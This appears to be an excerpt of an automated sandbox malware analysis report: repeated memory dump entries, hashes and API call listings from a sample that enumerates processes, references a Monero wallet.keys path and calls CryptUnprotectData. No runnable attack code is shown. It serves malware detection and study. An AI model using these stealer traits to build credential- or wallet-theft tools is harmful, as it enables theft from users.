                                 • Associated: 00000000.00000002.1448998514.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1448998514.0000000000ECD000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1448998514.0000000000EF2000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1448998514.000000000105A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1449146691.000000000106E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1449146691.00000000011FC000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1449146691.00000000012D8000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1449146691.00000000012FA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1449146691.0000000001304000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1449146691.0000000001312000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1449411479.0000000001313000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1449524692.00000000014B1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1449537821.00000000014B2000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                • String ID:
                                • API String ID: 420147892-0
                                • Opcode ID: 58c2ca9929fc9ed6f161ce61129773d3153e23ad6b2859200a009c46c31b5a93
                                • Instruction ID: 2c755bca91abbb9524114ce39a9a75a54dd2188fd8d5579ea7aeabb70a2bdf4b
                                • Opcode Fuzzy Hash: 58c2ca9929fc9ed6f161ce61129773d3153e23ad6b2859200a009c46c31b5a93
                                • Instruction Fuzzy Hash: DE011E75A00318EBCB24DFA5D948BEEBBF8FF48700F105288A94AA7240D7399B44CF50
                                APIs
                                  • Part of subcall function 00E2A740: lstrcpy.KERNEL32(00E30E17,00000000), ref: 00E2A788
                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00E305B7), ref: 00E286CA
                                • Process32First.KERNEL32(?,00000128), ref: 00E286DE
                                • Process32Next.KERNEL32(?,00000128), ref: 00E286F3
                                  • Part of subcall function 00E2A9B0: lstrlen.KERNEL32(?,008F8B80,?,\Monero\wallet.keys,00E30E17), ref: 00E2A9C5
                                  • Part of subcall function 00E2A9B0: lstrcpy.KERNEL32(00000000), ref: 00E2AA04
                                  • Part of subcall function 00E2A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00E2AA12
                                  • Part of subcall function 00E2A8A0: lstrcpy.KERNEL32(?,00E30E17), ref: 00E2A905
                                • CloseHandle.KERNEL32(?), ref: 00E28761
                                Memory Dump Source
                                • Source File: 00000000.00000002.1448998514.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                 • Associated: 00000000.00000002.1448984376.0000000000E10000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1448998514.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1448998514.0000000000ECD000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1448998514.0000000000EF2000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1448998514.000000000105A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1449146691.000000000106E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1449146691.00000000011FC000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1449146691.00000000012D8000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1449146691.00000000012FA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1449146691.0000000001304000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1449146691.0000000001312000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1449411479.0000000001313000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1449524692.00000000014B1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1449537821.00000000014B2000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                                • String ID:
                                • API String ID: 1066202413-0
                                • Opcode ID: 8ac7f025ad76df0ecbacd965a7455e859210c301ad7bd0b5259718dd193ca2dd
                                • Instruction ID: d966febd2f65466e380628eb2fd14e2c183fac0d70b6b9e6af5ae9c5df6406b2
                                • Opcode Fuzzy Hash: 8ac7f025ad76df0ecbacd965a7455e859210c301ad7bd0b5259718dd193ca2dd
                                • Instruction Fuzzy Hash: 64315E71901228EBCB28DF50EC45FEEB7B8FB44700F1041A9F50AB2190DB746A45CFA1
                                APIs
                                • CryptBinaryToStringA.CRYPT32(00000000,00E15184,40000001,00000000,00000000,?,00E15184), ref: 00E28EC0
                                Memory Dump Source
                                • Source File: 00000000.00000002.1448998514.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                 • Associated: 00000000.00000002.1448984376.0000000000E10000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1448998514.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1448998514.0000000000ECD000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1448998514.0000000000EF2000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1448998514.000000000105A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1449146691.000000000106E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1449146691.00000000011FC000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1449146691.00000000012D8000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1449146691.00000000012FA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1449146691.0000000001304000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1449146691.0000000001312000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1449411479.0000000001313000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1449524692.00000000014B1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1449537821.00000000014B2000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: BinaryCryptString
                                • String ID:
                                • API String ID: 80407269-0
                                • Opcode ID: 7c1f3580ddfe000a62680cc6e9599fedcdc4a0d7fd7dffb3802949da62d19c8c
                                • Instruction ID: c1f206107feb7b2944921aba7746038a308ac83e89c1e8479ddff491fe48822e
                                • Opcode Fuzzy Hash: 7c1f3580ddfe000a62680cc6e9599fedcdc4a0d7fd7dffb3802949da62d19c8c
                                • Instruction Fuzzy Hash: 28110370301208FFEB04CF64EA84FAB37A9AF89314F10A548F9199B244DB35EC41DB60
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00E30E00,00000000,?), ref: 00E279B0
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00E279B7
                                • GetLocalTime.KERNEL32(?,?,?,?,?,00E30E00,00000000,?), ref: 00E279C4
                                • wsprintfA.USER32 ref: 00E279F3
                                Memory Dump Source
                                • Source File: 00000000.00000002.1448998514.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                 • Associated: 00000000.00000002.1448984376.0000000000E10000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1448998514.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1448998514.0000000000ECD000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1448998514.0000000000EF2000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1448998514.000000000105A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1449146691.000000000106E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1449146691.00000000011FC000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1449146691.00000000012D8000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1449146691.00000000012FA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1449146691.0000000001304000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1449146691.0000000001312000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1449411479.0000000001313000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1449524692.00000000014B1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1449537821.00000000014B2000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateLocalProcessTimewsprintf
                                • String ID:
                                • API String ID: 377395780-0
                                • Opcode ID: 28a1032d1f06f4ad160b82898875db0eebaf1577111cf3fbdf3d9083ba6790fc
                                • Instruction ID: 4f37ff43601c3aa53936028d9a135c3ae7e162068defd0afac56f370e4abba3b
                                • Opcode Fuzzy Hash: 28a1032d1f06f4ad160b82898875db0eebaf1577111cf3fbdf3d9083ba6790fc
                                • Instruction Fuzzy Hash: 541118B2A04218EACB149FC9E945BBFB7F8FB4CB11F10461AF645A2284D2395940CBB0
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,008FD9A0,00000000,?,00E30E10,00000000,?,00000000,00000000), ref: 00E27A63
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00E27A6A
                                • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,008FD9A0,00000000,?,00E30E10,00000000,?,00000000,00000000,?), ref: 00E27A7D
                                • wsprintfA.USER32 ref: 00E27AB7
                                Memory Dump Source
                                • Source File: 00000000.00000002.1448998514.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                 • Associated: 00000000.00000002.1448984376.0000000000E10000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1448998514.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1448998514.0000000000ECD000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1448998514.0000000000EF2000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1448998514.000000000105A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1449146691.000000000106E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1449146691.00000000011FC000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1449146691.00000000012D8000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1449146691.00000000012FA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1449146691.0000000001304000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1449146691.0000000001312000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1449411479.0000000001313000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1449524692.00000000014B1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1449537821.00000000014B2000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                                • String ID:
                                • API String ID: 3317088062-0
                                • Opcode ID: 1bf8ac53643c265a3d0af3a752e13ccd366aa4f66c96de33cb9d2cfd51694f44
                                • Instruction ID: 9282343b54d5c7a24a89ac75bd34b2b351eb50ae960eeddd67a1e417631984f6
                                • Opcode Fuzzy Hash: 1bf8ac53643c265a3d0af3a752e13ccd366aa4f66c96de33cb9d2cfd51694f44
                                • Instruction Fuzzy Hash: D11152B1A45228EBDB208B54DC59FAAB778F744721F104395E516A32C0D7755E40CF51
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1449146691.000000000106E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                 • Associated: 00000000.00000002.1448984376.0000000000E10000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1448998514.0000000000E11000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1448998514.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1448998514.0000000000ECD000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1448998514.0000000000EF2000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1448998514.000000000105A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1449146691.00000000011FC000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1449146691.00000000012D8000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1449146691.00000000012FA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1449146691.0000000001304000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1449146691.0000000001312000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1449411479.0000000001313000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1449524692.00000000014B1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1449537821.00000000014B2000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: $Bt5$$Bt5$2+u
                                • API String ID: 0-2252982423
                                • Opcode ID: cc6031a83a667432ace5132151ef80b45964b5d2f686d965eff0e81eeb7c2efc
                                • Instruction ID: 067d4c6056bdba047b5d2e5721cfe7e82f90f3b61749a41027a5b22f4d7fd4b0
                                • Opcode Fuzzy Hash: cc6031a83a667432ace5132151ef80b45964b5d2f686d965eff0e81eeb7c2efc
                                • Instruction Fuzzy Hash: 2AB2D4F3A0C6109FE308AE29DC8567ABBE5EF94720F16893DEAC5C3744E63558408797
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1449146691.000000000106E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                 • Associated: 00000000.00000002.1448984376.0000000000E10000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1448998514.0000000000E11000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1448998514.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1448998514.0000000000ECD000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1448998514.0000000000EF2000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1448998514.000000000105A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1449146691.00000000011FC000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1449146691.00000000012D8000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1449146691.00000000012FA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1449146691.0000000001304000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1449146691.0000000001312000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1449411479.0000000001313000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1449524692.00000000014B1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1449537821.00000000014B2000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: ZAt^$`c]?$g2w
                                • API String ID: 0-3269156922
                                • Opcode ID: fe1cbc57413a2ae66edb0e1d35d599d300bb4b5d375c4177ddfdc1b37184127b
                                • Instruction ID: 4fa7bf646741efee2788e3bf5d307b7ebbf17b01444fb8dc205410251f2b14e8
                                • Opcode Fuzzy Hash: fe1cbc57413a2ae66edb0e1d35d599d300bb4b5d375c4177ddfdc1b37184127b
                                • Instruction Fuzzy Hash: 3FB2E2F360C6049FE708AE2DEC8567AFBE5EF94320F16493DEAC487744EA3558048796
                                APIs
                                • CoCreateInstance.COMBASE(00E2E118,00000000,00000001,00E2E108,00000000), ref: 00E23758
                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 00E237B0
                                Memory Dump Source
                                • Source File: 00000000.00000002.1448998514.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                 • Associated: 00000000.00000002.1448984376.0000000000E10000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1448998514.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1448998514.0000000000ECD000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1448998514.0000000000EF2000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1448998514.000000000105A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1449146691.000000000106E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1449146691.00000000011FC000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1449146691.00000000012D8000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1449146691.00000000012FA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1449146691.0000000001304000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1449146691.0000000001312000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1449411479.0000000001313000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1449524692.00000000014B1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1449537821.00000000014B2000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: ByteCharCreateInstanceMultiWide
                                • String ID:
                                • API String ID: 123533781-0
                                • Opcode ID: c49e455cd0d652ed34fd16a566ab5b0c033516668986c169068b7f59c9254067
                                • Instruction ID: abeb8d47390466496da7a8e34d9caf28134b9d1640029bcf1efa74ed748483a3
                                • Opcode Fuzzy Hash: c49e455cd0d652ed34fd16a566ab5b0c033516668986c169068b7f59c9254067
                                • Instruction Fuzzy Hash: EF410971A00A2C9FDB28DB58DC94B9BB7B5BB48702F4051D8E609EB2D0E7716E85CF50
                                APIs
                                • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00E19B84
                                • LocalAlloc.KERNEL32(00000040,00000000), ref: 00E19BA3
                                • LocalFree.KERNEL32(?), ref: 00E19BD3
                                Memory Dump Source
                                • Source File: 00000000.00000002.1448998514.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Local$AllocCryptDataFreeUnprotect
                                • String ID:
                                • API String ID: 2068576380-0
                                • Opcode ID: 7a5ba16658b5e29367fc5dace9ebdccf6eb2913ab3b98d81a2d5f9ce7a005dd8
                                • Instruction ID: c3add8691d038afb6e3ff95acdb4169060e5946209795c1edd566606d2342a37
                                • Opcode Fuzzy Hash: 7a5ba16658b5e29367fc5dace9ebdccf6eb2913ab3b98d81a2d5f9ce7a005dd8
                                • Instruction Fuzzy Hash: 5811F7B8A00209EFDB04DF94D989EAE77B5FF88300F104598E915A7380D775AE50CFA1
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1449146691.000000000106E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: NG_Q$a*N
                                • API String ID: 0-2983026385
                                • Opcode ID: 2af4a32d5df84fa84541de3a463004e6c2043251a3743f033f706457eeb6ba84
                                • Instruction ID: 38990c72d37c82fe4e45496ec73700fc75addd968a7f4540e55ca4f44b03d305
                                • Opcode Fuzzy Hash: 2af4a32d5df84fa84541de3a463004e6c2043251a3743f033f706457eeb6ba84
                                • Instruction Fuzzy Hash: 8092D3F3A082009FE714AE2DEC8567ABBE5EF94720F1A493DEAC5C7344E63558018797
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1449146691.000000000106E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: m0o$?v
                                • API String ID: 0-2276714564
                                • Opcode ID: 528501d093106100ea44b1c5e07491e36a32c20cb221d20ea9cc4e08ff377120
                                • Instruction ID: fba675195ae82f0089080afaf10dc4b7354eb24ca6181472d5e4bcf5f481d017
                                • Opcode Fuzzy Hash: 528501d093106100ea44b1c5e07491e36a32c20cb221d20ea9cc4e08ff377120
                                • Instruction Fuzzy Hash: 495146F3A086009FD7046F2DEC4577AF7EAEFD4720F1A852DEAC487340EA3548448696
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1449146691.000000000106E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: Fm{}
                                • API String ID: 0-1028336946
                                • Opcode ID: 144e833b3cfb2db4128e1def7e36d416f143e4b27821ea1ddc990d3c6585214c
                                • Instruction ID: 51068e41b42efe49e85066cffc40a5c80400edab46196f208acba818201dd35e
                                • Opcode Fuzzy Hash: 144e833b3cfb2db4128e1def7e36d416f143e4b27821ea1ddc990d3c6585214c
                                • Instruction Fuzzy Hash: 2D9229F360C2049FE304AE2DEC8567AFBE9EF94660F1A493DE6C4C3744E63598058796
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1449146691.000000000106E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: Cg
                                • API String ID: 0-2454403474
                                • Opcode ID: 0d99d8e997c6df10b85e5d97961b5c6512c59a532ac2e46e5cfe97491b4a7050
                                • Instruction ID: b504af1b2e9230897789ab76316b3295dbc22f9006c09efd4d35a6eb306763c7
                                • Opcode Fuzzy Hash: 0d99d8e997c6df10b85e5d97961b5c6512c59a532ac2e46e5cfe97491b4a7050
                                • Instruction Fuzzy Hash: DD5135F290C2049BE344BE28DC8577AB7E5EF94310F06893CEAC493744E97A98158787
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1449146691.000000000106E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: -Ulm
                                • API String ID: 0-3810557418
                                • Opcode ID: 7240b3e1e0246d01175147ee5b3f2e490de2b4ea0cd7f4e72b9e03a952d092fd
                                • Instruction ID: 114840205528825a319ea1cb23b2fb6cb2e6ae110044fc360c1fba77dfeb77dd
                                • Opcode Fuzzy Hash: 7240b3e1e0246d01175147ee5b3f2e490de2b4ea0cd7f4e72b9e03a952d092fd
                                • Instruction Fuzzy Hash: D94158F3F583045BE3449D7DEC8972A76CAD7D0214F2E8639D685C7788FC79A40A8282
                                Memory Dump Source
                                • Source File: 00000000.00000002.1449146691.000000000106E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 4851ff66d7c0ee1e572c659a01ceeab29d5f36c877281b63188589e37cf0f08c
                                • Instruction ID: 2c9cc0b29d6aa9b04540a4c6d0db45302378d6805c1bc53f110e55dbf2776fc7
                                • Opcode Fuzzy Hash: 4851ff66d7c0ee1e572c659a01ceeab29d5f36c877281b63188589e37cf0f08c
                                • Instruction Fuzzy Hash: FC715CF3A086145BE3087A2DDC9577ABAD6DBD4320F1B463DDB85C3744F97949058282
                                Memory Dump Source
                                • Source File: 00000000.00000002.1449146691.000000000106E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 2fca6440b47104166095e9733bc4d51a9c57d8b44f70ced461bc495e8f7ffe6d
                                • Instruction ID: 2aa2235a7d03c3e011152cc06a94420e7e9bbbc4a4fa4b61f160a26c3eb348ec
                                • Opcode Fuzzy Hash: 2fca6440b47104166095e9733bc4d51a9c57d8b44f70ced461bc495e8f7ffe6d
                                • Instruction Fuzzy Hash: 3F8127F39483049BE3086E39EC8477AB7D9EB90320F17493DEAC493780E93959458696
                                Memory Dump Source
                                • Source File: 00000000.00000002.1449146691.00000000011FC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 79d4962ef1266c347e8bc39fab766384912f5a74e27abd038ae04fc847b326e3
                                • Instruction ID: ae35d0eb4563fd6be1185147403e24f42403528c7c3cfb8e8880db26c4ba74c7
                                • Opcode Fuzzy Hash: 79d4962ef1266c347e8bc39fab766384912f5a74e27abd038ae04fc847b326e3
                                • Instruction Fuzzy Hash: 525105F251C204EFD314AF18EC85ABAB7E9EF98720F06483DE6C487640E6710850CB87
                                Memory Dump Source
                                • Source File: 00000000.00000002.1449146691.000000000106E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 81ab1af8da8a324af299b53e21fba94ce897054b7f3a03c42ab94744c5711b45
                                • Instruction ID: e3b6aa2813ade4448c98e6309270bbebdf02d4df3b9cebede02b7056c7ac2eea
                                • Opcode Fuzzy Hash: 81ab1af8da8a324af299b53e21fba94ce897054b7f3a03c42ab94744c5711b45
                                • Instruction Fuzzy Hash: EC5157F3E182105BE704692DDCC576AB7D9EBA4320F2B463CEF9893784E9359C0582D6
                                Memory Dump Source
                                • Source File: 00000000.00000002.1449146691.000000000106E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: eb55e2127c316115da2c713516164166e3716b99f73461ebf252e3c5aec2b060
                                • Instruction ID: 3669e08884fcf68c4cfb6a3b788540976bce9ec0cd91048ff4b2d0f6c27326ad
                                • Opcode Fuzzy Hash: eb55e2127c316115da2c713516164166e3716b99f73461ebf252e3c5aec2b060
                                • Instruction Fuzzy Hash: 42413AB36087044FF718AE3CEC8577BB7D5EB94320F45863DDA8087B84F93A59458286
                                Memory Dump Source
                                • Source File: 00000000.00000002.1448998514.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                                • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
